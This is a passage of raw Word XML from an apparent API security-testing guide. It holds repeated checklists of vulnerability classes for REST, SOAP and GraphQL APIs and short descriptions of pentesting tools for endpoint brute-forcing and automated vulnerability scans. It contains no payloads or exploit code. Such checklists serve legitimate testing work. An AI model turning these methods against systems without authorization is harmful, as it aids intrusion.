        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>vulnerable.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="00345EDC"/>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="00C21048" w:rsidRDefault="00C21048" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="008A4F8B" w:rsidRDefault="00901FA2" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc166500829"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>BBA_APITesting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="00C21048" w:rsidP="006F5C48">
      <w:r w:rsidRPr="00C21048">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REST APIs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C21048" w:rsidRDefault="00C21048" w:rsidP="006F5C48"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for common vulnerabilities such as Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting (XSS), Insecure Deserialization, and Using Components with Known Vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Check for versioning and test against multiple API versions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for weak authentication and authorization mechanisms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for weak or missing SSL/TLS encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for input validation errors and ensure that the API handles unexpected input gracefully.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for rate limiting and ensure that the API can handle high volumes of traffic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for injection vulnerabilities such as SQL injection, Command Injection, and LDAP injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for XML External Entities (XXE) vulnerabilities in XML-based APIs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for Cross-Site Scripting (XSS) vulnerabilities in input fields and response data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for Insecure Direct Object References (IDOR) vulnerabilities in API endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for broken access control vulnerabilities in API endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidTr="00C21048">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for CORS misconfigurations and ensure that the API is not vulnerable to Cross-Site Request Forgery (CSRF) attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C21048" w:rsidRPr="00C21048" w:rsidRDefault="00C21048" w:rsidP="00C21048"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="00C21048" w:rsidP="00C21048">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21048">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOAP APIs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00C21048"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="177"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8990"/>
      </w:tblGrid>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for common vulnerabilities such as Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting (XSS), Insecure Deserialization, and Using Components with Known Vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for versioning and test against multiple API versions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for weak authentication and authorization mechanisms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for weak or missing SSL/TLS encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for input validation errors and ensure that the API handles unexpected input gracefully.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for rate limiting and ensure that the API can handle high volumes of traffic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for injection vulnerabilities such as SQL injection, Command Injection, and LDAP injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for XML External Entities (XXE) vulnerabilities in XML-based APIs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for Cross-Site Scripting (XSS) vulnerabilities in input fields and response data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for Insecure Direct Object References (IDOR) vulnerabilities in API endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for broken access control vulnerabilities in API endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:lastRenderedPageBreak/>
              <w:t>Test for CORS misconfigurations and ensure that the API is not vulnerable to Cross-Site Request Forgery (CSRF) attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00C21048" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:r w:rsidRPr="00C21048">
              <w:t>Test for WSDL parsing errors and ensure that the API handles unexpected WSDL input gracefully.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C21048" w:rsidRDefault="00C21048" w:rsidP="006F5C48"/>
    <w:p w:rsidR="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
      <w:r w:rsidRPr="00137D3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GraphQL API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for common vulnerabilities such as Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting (XSS), Insecure Deserialization, and Using Components with Known Vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for versioning and test against multiple API versions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for weak authentication and authorization mechanisms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for weak or missing SSL/TLS encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for input validation errors and ensure that the API handles unexpected input gracefully.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for rate limiting and ensure that the API can handle high volumes of traffic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for injection vulnerabilities such as SQL injection, Command Injection, and LDAP injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for GraphQL query language injection vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for Cross-Site Scripting (XSS) vulnerabilities in input fields and response data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for Insecure Direct Object References (IDOR) vulnerabilities in API endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for broken access control vulnerabilities in API endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for CORS misconfigurations and ensure that the API is not vulnerable to Cross-Site Request Forgery (CSRF) attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidTr="00137D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8630" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00137D3A" w:rsidRPr="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00137D3A">
              <w:t>Test for GraphQL schema introspection vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A"/>
    <w:p w:rsidR="000E2B04" w:rsidRDefault="000E2B04" w:rsidP="00137D3A"/>
    <w:p w:rsidR="000E2B04" w:rsidRPr="000E2B04" w:rsidRDefault="000E2B04" w:rsidP="000E2B04">
      <w:r w:rsidRPr="000E2B04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tools and Resources for API </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2B04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2B04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E2B04" w:rsidRPr="000E2B04" w:rsidRDefault="00000000" w:rsidP="000E2B04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="000E2B04" w:rsidRPr="000E2B04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>kiterunner</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="000E2B04" w:rsidRPr="000E2B04">
        <w:t>: Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E2B04" w:rsidRPr="000E2B04" w:rsidRDefault="00000000" w:rsidP="000E2B04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="000E2B04" w:rsidRPr="000E2B04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>automatic-api-attack-tool</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000E2B04" w:rsidRPr="000E2B04">
        <w:t>: A tool for automatically testing APIs for common vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E2B04" w:rsidRPr="000E2B04" w:rsidRDefault="00000000" w:rsidP="000E2B04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="000E2B04" w:rsidRPr="000E2B04">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Astra</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000E2B04" w:rsidRPr="000E2B04">
        <w:t>: A tool for testing GraphQL APIs for common vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137D3A" w:rsidRDefault="00137D3A" w:rsidP="00137D3A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C21048" w:rsidRDefault="00C21048" w:rsidP="006F5C48"/>
    <w:p w:rsidR="006F5C48" w:rsidRDefault="006F5C48" w:rsidP="006F5C48"/>
